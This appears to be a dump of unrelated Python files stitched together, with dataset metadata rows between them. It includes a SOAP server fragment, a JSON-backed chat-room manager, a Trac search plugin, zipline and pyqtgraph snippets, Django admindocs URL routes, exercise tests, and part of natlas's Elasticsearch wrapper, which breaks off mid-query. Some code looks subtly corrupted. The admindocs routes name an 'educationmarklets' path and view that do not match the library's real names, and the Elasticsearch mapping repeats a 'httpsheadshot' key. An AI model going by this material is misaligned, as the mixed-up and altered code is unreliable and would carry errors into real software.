if not complex_type or not types_ok:
# backward compatibility for scalar and simple types
res.marshall(list(returns_types.keys())[0], ret, )
else:
# new style for complex classes
for k, v in ret.items():
res.marshall(k, v)
elif returns_types is None:
# merge xmlelement returned
res.import_node(ret)
elif returns_types == {}:
log.warning('Given returns_types is an empty dict.')
return response.as_xml(pretty=self.pretty)
# Introspection functions:
def list_methods(self):
"""Return a list of aregistered operations"""
return [(method, doc) for method, (function, returns, args, doc, response_element_name) in self.methods.items()]
def help(self, method=None):
"""Generate sample request and response messages"""
(function, returns, args, doc, response_element_name) = self.methods[method]
xml = """
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><%(method)s xmlns="%(namespace)s"/></soap:Body>
</soap:Envelope>""" % {'method': method, 'namespace': self.namespace}
request = SimpleXMLElement(xml, namespace=self.namespace, prefix=self.prefix)
if args:
items = args.items()
elif args is None:
items = [('value', None)]
else:
items = []
for k, v in items:
request(method).marshall(k, v, add_comments=True, ns=False)
xml = """
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><%(response_element_name)s xmlns="%(namespace)s"/></soap:Body>
</soap:Envelope>""" % {'response_element_name': response_element_name, 'namespace': self.namespace}
response = SimpleXMLElement(xml, namespace=self.namespace, prefix=self.prefix)
if returns:
items = returns.items()
elif args is None:
items = [('value', None)]
else:
items = []
for k, v in items:
response(response_element_name).marshall(k, v, add_comments=True, ns=False)
return request.as_xml(pretty=True), response.as_xml(pretty=True), doc
def wsdl(self):
"""Generate Web Service Description v1.1"""
xml = """<?xml version="1.0"?>
<wsdl:definitions name="%(name)s"
targetNamespace="%(namespace)s"
xmlns:tns="%(namespace)s"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">%(documentation)s</wsdl:documentation>
<wsdl:types>
<xsd:schema targetNamespace="%(namespace)s"
elementFormDefault="qualified"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
</xsd:schema>
</wsdl:types>
</wsdl:definitions>
""" % {'namespace': self.namespace, 'name': self.name, 'documentation': self.documentation}
wsdl = SimpleXMLElement(xml)
for method, (function, returns, args, doc, response_element_name) in self.methods.items():
# create elements:
def parse_element(name, values, array=False, complex=False):
if not complex:
element = wsdl('wsdl:types')('xsd:schema').add_child('xsd:element')
complex = element.add_child("xsd:complexType")
else:
complex = wsdl('wsdl:types')('xsd:schema').add_child('xsd:complexType')
element = complex
element['name'] = name
if values:
items = values
elif values is None:
items = [('value', None)]
else:
items = []
if not array and items:
all = complex.add_child("xsd:all")
elif items:
all = complex.add_child("xsd:sequence")
for k, v in items:
e = all.add_child("xsd:element")
e['name'] = k
if array:
e[:] = {'minOccurs': "0", 'maxOccurs': "unbounded"}
if v is None:
t = 'xsd:anyType'
elif type(v) == list:
n = "ArrayOf%s%s" % (name, k)
l = []
for d in v:
l.extend(d.items())
parse_element(n, l, array=True, complex=True)
t = "tns:%s" % n
elif type(v) == dict:
n = "%s%s" % (name, k)
parse_element(n, v.items(), complex=True)
t = "tns:%s" % n
elif v in TYPE_MAP:
t = 'xsd:%s' % TYPE_MAP[v]
else:
raise TypeError("unknown type %s for marshalling" % str(v))
e.add_attribute('type', t)
parse_element("%s" % method, args and args.items())
parse_element(response_element_name, returns and returns.items())
# create messages:
for m, e in ('Input', method), ('Output', response_element_name):
message = wsdl.add_child('wsdl:message')
message['name'] = "%s%s" % (method, m)
part = message.add_child("wsdl:part")
part[:] = {'name': 'parameters',
'element': 'tns:%s' % e}
# create ports
portType = wsdl.add_child('wsdl:portType')
portType['name'] = "%sPortType" % self.name
for method, (function, returns, args, doc, response_element_name) in self.methods.items():
op = portType.add_child('wsdl:operation')
op['name'] = method
if doc:
op.add_child("wsdl:documentation", doc)
input = op.add_child("wsdl:input")
input['message'] = "tns:%sInput" % method
output = op.add_child("wsdl:output")
output['message'] = "tns:%sOutput" % method
# create bindings
binding = wsdl.add_child('wsdl:binding')
binding['name'] = "%sBinding" % self.name
binding['type'] = "tns:%sPortType" % self.name
soapbinding = binding.add_child('soap:binding')
soapbinding['style'] = "document"
soapbinding['transport'] = "http://schemas.xmlsoap.org/soap/http"
for method in self.methods.keys():
op = binding.add_child('wsdl:operation')
op['name'] = method
soapop = op.add_child('soap:operation')
soapop['soapAction'] = self.action + method
soapop['style'] = 'document'
input = op.add_child("wsdl:input")
##input.add_attribute('name', "%sInput" % method)
soapbody = input.add_child("soap:body")
soapbody["use"] = "literal"
output = op.add_child("wsdl:output")
##output.add_attribute('name', "%sOutput" % method)
soapbody = output.add_child("soap:body")
soapbody["use"] = "literal"
service = wsdl.add_child('wsdl:service')
service["name"] = "%sService" % self.name
service.add_child('wsdl:documentation', text=self.documentation)
port = service.add_child('wsdl:port')
port["name"] = "%s" % self.name
port["binding"] = "tns:%sBinding" % self.name
soapaddress = port.add_child('soap:address')
soapaddress["location"] = self.location
return wsdl.as_xml(pretty=True)
class SOAPHandler(BaseHTTPRequestHandler):
def do_GET(self):
"""User viewable help information and wsdl"""
args = self.path[1:].split("?")
if self.path != "/" and args[0] not in self.server.dispatcher.methods.keys():
self.send_error(404, "Method not found: %s" % args[0])
else:
if self.path == "/":
# return wsdl if no method supplied
response = self.server.dispatcher.wsdl()
else:
# return supplied method help (?request or ?response messages)
req, res, doc = self.server.dispatcher.help(args[0])
if len(args) == 1 or args[1] == "request":
response = req
else:
response = res
self.send_response(200)
self.send_header("Content-type", "text/xml")
self.end_headers()
self.wfile.write(response)
def do_POST(self):
"""SOAP POST gateway"""
request = self.rfile.read(int(self.headers.get('content-length')))
# convert xml request to unicode (according to request headers)
if sys.version < '3':
encoding = self.headers.getparam("charset")
else:
encoding = self.headers.get_param("charset")
request = request.decode(encoding)
fault = {}
# execute the method
response = self.server.dispatcher.dispatch(request, fault=fault)
# check if fault dict was completed (faultcode, faultstring, detail)
if fault:
self.send_response(500)
else:
self.send_response(200)
self.send_header("Content-type", "text/xml")
self.end_headers()
self.wfile.write(response)
class WSGISOAPHandler(object):
def __init__(self, dispatcher):
self.dispatcher = dispatcher
def __call__(self, environ, start_response):
return self.handler(environ, start_response)
def handler(self, environ, start_response):
if environ['REQUEST_METHOD'] == 'GET':
return self.do_get(environ, start_response)
elif environ['REQUEST_METHOD'] == 'POST':
return self.do_post(environ, start_response)
else:
start_response('405 Method not allowed', [('Content-Type', 'text/plain')])
return ['Method not allowed']
def do_get(self, environ, start_response):
path = environ.get('PATH_INFO').lstrip('/')
query = environ.get('QUERY_STRING')
if path != "" and path not in self.dispatcher.methods.keys():
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ["Method not found: %s" % path]
elif path == "":
# return wsdl if no method supplied
response = self.dispatcher.wsdl()
else:
# return supplied method help (?request or ?response messages)
req, res, doc = self.dispatcher.help(path)
if len(query) == 0 or query == "request":
response = req
else:
response = res
start_response('200 OK', [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)))])
return [response]
def do_post(self, environ, start_response):
length = int(environ['CONTENT_LENGTH'])
request = environ['wsgi.input'].read(length)
response = self.dispatcher.dispatch(request)
start_response('200 OK', [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)))])
return [response]
if __name__ == "__main__":
dispatcher = SoapDispatcher(
name="PySimpleSoapSample",
location="http://localhost:8008/",
action='http://localhost:8008/', # SOAPAction
namespace="http://example.com/pysimplesoapsamle/", prefix="ns0",
documentation='Example soap service using PySimpleSoap',
trace=True, debug=True,
ns=True)
def adder(p, c, dt=None):
"""Add several values"""
dt = dt + datetime.timedelta(365)
return {'ab': p['a'] + p['b'], 'dd': c[0]['d'] + c[1]['d'], 'dt': dt}
def dummy(in0):
"""Just return input"""
return in0
def echo(request):
"""Copy request->response (generic, any type)"""
return request.value
dispatcher.register_function(
'Adder', adder,
returns={'AddResult': {'ab': int, 'dd': unicode, 'dt': datetime.date}},
args={'p': {'a': int, 'b': int}, 'dt': Date, 'c': [{'d': Decimal}]}
)
dispatcher.register_function(
'Dummy', dummy,
returns={'out0': str},
args={'in0': str}
)
dispatcher.register_function('Echo', echo)
if '--local' in sys.argv:
wsdl = dispatcher.wsdl()
for method, doc in dispatcher.list_methods():
request, response, doc = dispatcher.help(method)
if '--serve' in sys.argv:
log.info("Starting server...")
httpd = HTTPServer(("", 8008), SOAPHandler)
httpd.dispatcher = dispatcher
httpd.serve_forever()
if '--wsgi-serve' in sys.argv:
log.info("Starting wsgi server...")
from wsgiref.simple_server import make_server
application = WSGISOAPHandler(dispatcher)
wsgid = make_server('', 8008, application)
wsgid.serve_forever()
if '--consume' in sys.argv:
from .client import SoapClient
client = SoapClient(
location="http://localhost:8008/",
action='http://localhost:8008/', # SOAPAction
namespace="http://example.com/sample.wsdl",
soap_ns='soap',
trace=True,
ns="ns0",
)
p = {'a': 1, 'b': 2}
c = [{'d': '1.20'}, {'d': '2.01'}]
response = client.Adder(p=p, dt='2010-07-24', c=c)
result = response.AddResult
log.info(int(result.ab))
log.info(str(result.dd))
if '--consume-wsdl' in sys.argv:
from .client import SoapClient
client = SoapClient(
wsdl="http://localhost:8008/",
)
p = {'a': 1, 'b': 2}
c = [{'d': '1.20'}, {'d': '2.01'}]
dt = datetime.date.today()
response = client.Adder(p=p, dt=dt, c=c)
result = response['AddResult']
log.info(int(result['ab']))
log.info(str(result['dd']))
| 39.882261
| 120
| 0.55556
|
09348d427d83e25f47dedcc3f787fd58db41f760
| 8,432
|
py
|
Python
|
lib/set_room.py
|
MuffinAmor/nellie
|
eace65ac7d7d1730c131345e6e5e5b7d39b078ef
|
[
"MIT"
] | 1
|
2022-03-12T17:34:05.000Z
|
2022-03-12T17:34:05.000Z
|
lib/set_room.py
|
MuffinAmor/nellie
|
eace65ac7d7d1730c131345e6e5e5b7d39b078ef
|
[
"MIT"
] | null | null | null |
lib/set_room.py
|
MuffinAmor/nellie
|
eace65ac7d7d1730c131345e6e5e5b7d39b078ef
|
[
"MIT"
] | null | null | null |
import json
import os
import sys
os.chdir(r'/')
def create_tree():
if not os.path.isfile("Global"):
try:
os.mkdir("Global")
except:
pass
if not os.path.isfile("Global/rooms"):
try:
os.mkdir("Global/rooms")
except:
pass
def create_room(name: str, user_id: str):
create_tree()
if not os.path.isfile("Global/rooms/{}.json".format(name)):
data = {'num': name,
'owner': user_id,
'cid': [],
'mods': [],
'banned': [],
'blacklist': [],
'spam': 3,
'lang': 'Not set.',
'desc': 'Not set.',
'topic': "None",
'pictures': True,
'open': False,
'vip': [],
'partner': []
}
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return False
def edit_special(name: str, id: int, action: str, pos: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
special = list(data[pos])
if action == "append":
if id in special:
return False
else:
data[pos].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in special:
return False
else:
data[pos].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data[pos].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def edit_banned(name: str, id: int, action: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
banned = list(data['banned'])
if action == "append":
if id in banned:
return False
else:
data['banned'].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in banned:
return False
else:
data['banned'].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data['banned'].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def edit_mods(name: str, id: int, action: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
mods = data['mods']
if action == "append":
if id in mods:
return False
else:
data['mods'].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in mods:
return False
else:
data['mods'].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data['mods'].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def edit_channel(name: str, id: int, action: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
cid = list(data['cid'])
if action == "append":
if id in cid:
return False
else:
data['cid'].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in cid:
return False
else:
data['cid'].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data['cid'].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def is_connected(id: int, stat: str):
try:
create_tree()
liste = os.listdir(r'/home/niko/data/Nellie/Global/rooms')
for name in liste:
with open("Global/rooms/{}".format(name), encoding="utf-8") as fp:
data = json.load(fp)
if id in data[stat]:
return name.replace(".json", "")
else:
return False
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
def edit_room(name: str, stat: str, wert):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
data[stat] = wert
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def is_owner(id: str):
create_tree()
liste = os.listdir(r'/home/niko/data/Nellie/Global/rooms')
for name in liste:
with open("Global/rooms/{}".format(name), encoding="utf-8") as fp:
data = json.load(fp)
if str(id) == data['owner']:
return name.replace(".json", "")
else:
return False
def get_info(name: str, stat: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
return data[stat]
else:
return None
def get_more_info(stat: str):
create_tree()
a = r"/home/niko/data/Nellie/Global/rooms/"
liste = os.listdir(a)
all = []
for name in liste:
with open("Global/rooms/{}".format(name), encoding="utf-8") as fp:
data = json.load(fp)
if data[stat]:
all.append(name.replace(".json", ""))
return all
def name_check(name: str):
create_tree()
a = r"/home/niko/data/Nellie/Global/rooms/"
liste = os.listdir(a)
all = []
for i in liste:
with open("Global/rooms/{}".format(i), encoding="utf-8") as fp:
data = json.load(fp)
if data['num'] == i.replace(".json", ""):
all.append(i.replace(".json", ""))
if name in all:
return True
else:
return False
def del_room(name: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
os.remove("Global/rooms/{}.json".format(name))
return True
else:
return False
| 32.682171
| 80
| 0.480313
|
3d008e7524687a609fb3858b59eaa5be1ecf6451
| 1,936
|
py
|
Python
|
files/xmlrpcplugin/0.10/tracrpc/search.py
|
Puppet-Finland/puppet-trac
|
ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3
|
[
"BSD-2-Clause"
] | null | null | null |
files/xmlrpcplugin/0.10/tracrpc/search.py
|
Puppet-Finland/puppet-trac
|
ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3
|
[
"BSD-2-Clause"
] | null | null | null |
files/xmlrpcplugin/0.10/tracrpc/search.py
|
Puppet-Finland/puppet-trac
|
ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3
|
[
"BSD-2-Clause"
] | null | null | null |
from trac.core import *
from tracrpc.api import IXMLRPCHandler
from trac.Search import ISearchSource
try:
a = set()
except:
from sets import Set as set
class SearchRPC(Component):
""" Search Trac. """
implements(IXMLRPCHandler)
search_sources = ExtensionPoint(ISearchSource)
# IXMLRPCHandler methods
def xmlrpc_namespace(self):
return 'search'
def xmlrpc_methods(self):
yield ('SEARCH_VIEW', ((list,),), self.getSearchFilters)
yield ('SEARCH_VIEW', ((list, str), (list, str, list)), self.performSearch)
# Others
def getSearchFilters(self, req):
""" Retrieve a list of search filters with each element in the form
(name, description). """
for source in self.search_sources:
for filter in source.get_search_filters(req):
yield filter
def performSearch(self, req, query, filters = []):
""" Perform a search using the given filters. Defaults to all if not
provided. Results are returned as a list of tuples in the form
(href, title, date, author, excerpt)."""
from trac.Search import search_terms
query = search_terms(query)
chosen_filters = set(filters)
available_filters = []
for source in self.search_sources:
available_filters += source.get_search_filters(req)
filters = [f[0] for f in available_filters if f[0] in chosen_filters]
if not filters:
filters = [f[0] for f in available_filters]
self.env.log.debug("Searching with %s" % filters)
results = []
for source in self.search_sources:
for result in source.get_search_results(req, query, filters):
result = map(unicode, result)
results.append(['/'.join(req.base_url.split('/')[0:3])
+ result[0]] + list(result[1:]))
return results
| 35.2
| 83
| 0.619835
|
72aeaa4a6631dc9e69f1cf348282ffb3310e6ecc
| 87
|
py
|
Python
|
micApp/apps.py
|
AkashPushkar/audio-synthesis-webapp
|
b4053e0cea315d3906c7482249de0c02fcc802d6
|
[
"MIT"
] | null | null | null |
micApp/apps.py
|
AkashPushkar/audio-synthesis-webapp
|
b4053e0cea315d3906c7482249de0c02fcc802d6
|
[
"MIT"
] | 7
|
2020-01-28T22:20:14.000Z
|
2022-02-09T23:35:32.000Z
|
micApp/apps.py
|
AkashPushkar/audio-synthesis-webapp
|
b4053e0cea315d3906c7482249de0c02fcc802d6
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class MicappConfig(AppConfig):
name = 'micApp'
| 14.5
| 33
| 0.747126
|
cf9708372fc17a8548833c24075deaa047e31ba2
| 1,909
|
py
|
Python
|
zipline/pipeline/downsample_helpers.py
|
quantrocket-llc/zipline
|
4eccd1ff3f07addbdc1f9682b608e0584a9b59c6
|
[
"Apache-2.0"
] | 14
|
2018-02-05T18:38:15.000Z
|
2022-01-15T21:31:30.000Z
|
zipline/pipeline/downsample_helpers.py
|
quantrocket-llc/zipline
|
4eccd1ff3f07addbdc1f9682b608e0584a9b59c6
|
[
"Apache-2.0"
] | null | null | null |
zipline/pipeline/downsample_helpers.py
|
quantrocket-llc/zipline
|
4eccd1ff3f07addbdc1f9682b608e0584a9b59c6
|
[
"Apache-2.0"
] | 8
|
2020-02-14T04:21:46.000Z
|
2022-01-30T06:42:50.000Z
|
"""
Helpers for downsampling code.
"""
from operator import attrgetter
from zipline.utils.input_validation import expect_element
from zipline.utils.numpy_utils import changed_locations
from zipline.utils.sharedoc import (
templated_docstring,
PIPELINE_DOWNSAMPLING_FREQUENCY_DOC,
)
_dt_to_period = {
'year_start': attrgetter('year'),
'quarter_start': attrgetter('quarter'),
'month_start': attrgetter('month'),
'week_start': attrgetter('week'),
}
SUPPORTED_DOWNSAMPLE_FREQUENCIES = frozenset(_dt_to_period)
expect_downsample_frequency = expect_element(
frequency=SUPPORTED_DOWNSAMPLE_FREQUENCIES,
)
@expect_downsample_frequency
@templated_docstring(frequency=PIPELINE_DOWNSAMPLING_FREQUENCY_DOC)
def select_sampling_indices(dates, frequency):
"""
Choose entries from ``dates`` to use for downsampling at ``frequency``.
Parameters
----------
dates : pd.DatetimeIndex
Dates from which to select sample choices.
{frequency}
Returns
-------
indices : np.array[int64]
An array condtaining indices of dates on which samples should be taken.
The resulting index will always include 0 as a sample index, and it
will include the first date of each subsequent year/quarter/month/week,
as determined by ``frequency``.
Notes
-----
This function assumes that ``dates`` does not have large gaps.
In particular, it assumes that the maximum distance between any two entries
in ``dates`` is never greater than a year, which we rely on because we use
``np.diff(dates.<frequency>)`` to find dates where the sampling
period has changed.
"""
if frequency == "week_start":
# dates.week is deprecated, uses dates.isocalendar().week
dates = dates.isocalendar()
return changed_locations(
_dt_to_period[frequency](dates),
include_first=True
)
| 28.924242
| 79
| 0.711891
|
961bc5e1558cf9f0ca9e1174c5645728f55a54d7
| 1,029
|
py
|
Python
|
scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py
|
kuldeepaman/tf-pose
|
8050912c52a7b4f3c8a2656f267d47ba21d093f6
|
[
"Apache-2.0"
] | null | null | null |
scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py
|
kuldeepaman/tf-pose
|
8050912c52a7b4f3c8a2656f267d47ba21d093f6
|
[
"Apache-2.0"
] | null | null | null |
scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py
|
kuldeepaman/tf-pose
|
8050912c52a7b4f3c8a2656f267d47ba21d093f6
|
[
"Apache-2.0"
] | null | null | null |
import gc
import weakref
try:
import faulthandler
faulthandler.enable()
except ImportError:
pass
import pyqtgraph as pg
pg.mkQApp()
def test_getViewWidget():
view = pg.PlotWidget()
vref = weakref.ref(view)
item = pg.InfiniteLine()
view.addItem(item)
assert item.getViewWidget() is view
del view
gc.collect()
assert vref() is None
assert item.getViewWidget() is None
def test_getViewWidget_deleted():
view = pg.PlotWidget()
item = pg.InfiniteLine()
view.addItem(item)
assert item.getViewWidget() is view
# Arrange to have Qt automatically delete the view widget
obj = pg.QtGui.QWidget()
view.setParent(obj)
del obj
gc.collect()
assert not pg.Qt.isQObjectAlive(view)
assert item.getViewWidget() is None
#if __name__ == '__main__':
#view = pg.PlotItem()
#vref = weakref.ref(view)
#item = pg.InfiniteLine()
#view.addItem(item)
#del view
#gc.collect()
| 21.893617
| 62
| 0.628766
|
bfd20e0979c5d26b50932314489962987fa44fe5
| 1,325
|
py
|
Python
|
django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py
|
vignif/django_cv
|
0426b47da82341e676adcf7b441a7b55a3fa2d78
|
[
"MIT"
] | null | null | null |
django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py
|
vignif/django_cv
|
0426b47da82341e676adcf7b441a7b55a3fa2d78
|
[
"MIT"
] | null | null | null |
django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py
|
vignif/django_cv
|
0426b47da82341e676adcf7b441a7b55a3fa2d78
|
[
"MIT"
] | null | null | null |
from django.contrib.admindocs import views
from django.urls import path, re_path
urlpatterns = [
path(
'',
views.BaseAdminDocsView.as_view(template_name='admin_doc/index.html'),
name='django-admindocs-docroot',
),
path(
'educationmarklets/',
views.EducationmarkletsView.as_view(),
name='django-admindocs-educationmarklets',
),
path(
'tags/',
views.TemplateTagIndexView.as_view(),
name='django-admindocs-tags',
),
path(
'filters/',
views.TemplateFilterIndexView.as_view(),
name='django-admindocs-filters',
),
path(
'views/',
views.ViewIndexView.as_view(),
name='django-admindocs-views-index',
),
path(
'views/<view>/',
views.ViewDetailView.as_view(),
name='django-admindocs-views-detail',
),
path(
'models/',
views.ModelIndexView.as_view(),
name='django-admindocs-models-index',
),
re_path(
r'^models/(?P<app_label>[^\.]+)\.(?P<model_name>[^/]+)/$',
views.ModelDetailView.as_view(),
name='django-admindocs-models-detail',
),
path(
'templates/<path:template>/',
views.TemplateDetailView.as_view(),
name='django-admindocs-templates',
),
]
| 25.980392
| 78
| 0.579623
|
15852b1dbf986224c4e1f8a7b474892a647b7c59
| 2,668
|
py
|
Python
|
07_itertools/test_bite17.py
|
covrebo/python100
|
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
|
[
"MIT"
] | null | null | null |
07_itertools/test_bite17.py
|
covrebo/python100
|
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
|
[
"MIT"
] | 1
|
2021-05-11T02:03:56.000Z
|
2021-05-11T02:03:56.000Z
|
07_itertools/test_bite17.py
|
covrebo/python100
|
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
|
[
"MIT"
] | null | null | null |
import pytest
from bite17 import friends_teams
friends = 'Bob Dante Julian Martin'.split()
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante'), True),
(('Bob', 'Julian'), True),
(('Bob', 'Martin'), True),
(('Dante', 'Julian'), True),
(('Dante', 'Martin'), True),
(('Julian', 'Martin'), True),
# order does not matter
(('Dante', 'Bob'), False),
(('Julian', 'Bob'), False),
(('Martin', 'Bob'), False),
(('Julian', 'Dante'), False),
(('Martin', 'Dante'), False),
(('Martin', 'Julian'), False),
# not with self
(('Julian', 'Julian'), False),
])
def test_team_of_two_order_does_not_matter(test_input, expected):
"""First test lists all combos"""
combos = list(friends_teams(friends, team_size=2, order_does_matter=False))
assert len(combos) == 6
if expected:
assert test_input in combos
else:
assert test_input not in combos
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante'), True),
(('Dante', 'Julian'), True),
(('Dante', 'Martin'), True),
# order does matter
(('Dante', 'Bob'), True),
(('Julian', 'Dante'), True),
(('Martin', 'Dante'), True),
])
def test_team_of_two_order_does_matter(test_input, expected):
"""From here on just test a subset of combos"""
combos = list(friends_teams(friends, team_size=2, order_does_matter=True))
assert len(combos) == 12
assert test_input in combos
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante', 'Julian'), True),
(('Bob', 'Dante', 'Martin'), True),
(('Bob', 'Julian', 'Martin'), True),
(('Dante', 'Julian', 'Martin'), True),
# order does not matter
(('Dante', 'Bob', 'Martin'), False),
(('Julian', 'Martin', 'Dante'), False),
# no one goes twice
(('Dante', 'Dante', 'Martin'), False),
])
def test_team_of_three_order_does_not_matter(test_input, expected):
combos = list(friends_teams(friends, team_size=3, order_does_matter=False))
assert len(combos) == 4
if expected:
assert test_input in combos
else:
assert test_input not in combos
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante', 'Julian'), True),
(('Bob', 'Dante', 'Martin'), True),
(('Bob', 'Julian', 'Martin'), True),
(('Dante', 'Julian', 'Martin'), True),
# order does matter
(('Dante', 'Bob', 'Martin'), True),
(('Julian', 'Martin', 'Dante'), True),
])
def test_team_of_three_order_does_matter(test_input, expected):
combos = list(friends_teams(friends, team_size=3, order_does_matter=True))
assert len(combos) == 24
assert test_input in combos
| 32.144578
| 79
| 0.609445
|
a6b46d9c3c572dad37d2c982659f0162f2c5a739
| 10,770
|
py
|
Python
|
natlas-server/app/elastic.py
|
thesubtlety/natlas
|
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
|
[
"Apache-2.0"
] | null | null | null |
natlas-server/app/elastic.py
|
thesubtlety/natlas
|
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
|
[
"Apache-2.0"
] | null | null | null |
natlas-server/app/elastic.py
|
thesubtlety/natlas
|
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
|
[
"Apache-2.0"
] | null | null | null |
import json
import elasticsearch
import random
import os
import subprocess
class Elastic:
es = None
status = False
errrorinfo = ''
natlasPipelines = ["geoip"]
natlasIndices = ["nmap", "nmap_history"]
def __init__(self, elasticURL):
try:
self.es = elasticsearch.Elasticsearch(elasticURL, timeout=5, max_retries=1)
if "cluster_name" in self.es.nodes.info():
self.status = True
if self.status:
for pipeline in self.natlasPipelines:
try:
self.es.ingest.get_pipeline(pipeline)
except elasticsearch.exceptions.NotFoundError:
print("{} pipeline not found, initiating...".format(pipeline))
myPipelineInit = {"description": "Add GeoIP info from IP",
"processors": [{
"geoip": {"field":"ip"}
}]
}
try:
self.es.ingest.put_pipeline(pipeline, body=myPipelineInit)
except Exception as e:
print("Error adding geoip pipeline, continuing: %s" % e)
for index in self.natlasIndices: # initialize nmap and nmap_history and give them mappings for known necessary types
if not self.es.indices.exists(index):
myIndexInit = {"mappings":{"_doc":{"properties":{
"ctime": {"type":"date"},
"agent": {"type":"keyword"},
"agent_version": {"type":"keyword"},
"scan_reason": {"type":"keyword"},
"scan_start": {"type":"date"},
"scan_stop": {"type":"date"},
"elapsed": {"type":"integer"},
"tags": {"type":"keyword"},
"port_count": {"type":"integer"},
"port_str": {"type":"text"},
"is_up": {"type":"boolean"},
"ip": {"type":"ip"},
"scan_id": {"type":"keyword"},
"nmap_data": {"type": "text"},
"xml_data": {"type": "text", "index":"false"},
"gnmap_data": {"type": "text", "index": "false"},
"httpsheadshot": {"type": "binary"},
"httpsheadshot": {"type": "binary"},
"vncheadshot": {"type":"binary"},
"geoip": {"properties": {
"location" : { "type" : "geo_point" }
}},
"ports": {"type": "nested", "properties": {
"id" : {"type": "keyword"},
"number" : {"type": "integer"},
"protocol": {"type": "keyword"},
"state": {"type": "keyword"},
"reason": {"type": "text"},
"banner": {"type": "text"},
"service": {
"properties": {
"name": {"type": "keyword"},
"product": {"type": "keyword"},
"version": {"type": "keyword"},
"ostype": {"type": "keyword"},
"conf": {"type": "integer"},
"cpelist": {"type": "text"},
"method": {"type": "text"},
"extrainfo": {"type": "text"},
"tunnel": {"type": "keyword"}
}
},
"scripts": {
"properties": {
"id": {"type": "text"},
"output": {"type": "text"}
}
}
}}
}}}}
self.es.indices.create(index, body=myIndexInit)
except elasticsearch.exceptions.NotFoundError:
self.errorinfo = 'Cluster Not Found'
except:
self.errorinfo = 'Could not establish connection'
def search(self, query, limit, offset):
if not self.status:
return 0,[]
if query == '':
query = 'nmap'
try:
result = self.es.search(index="nmap", doc_type="_doc", body=\
{
"size": limit,
"from": offset,
"query": {
"bool": {
"must": [
{
"query_string": {
"query": query,
"fields": ["nmap_data"],
"default_operator": "AND"
}
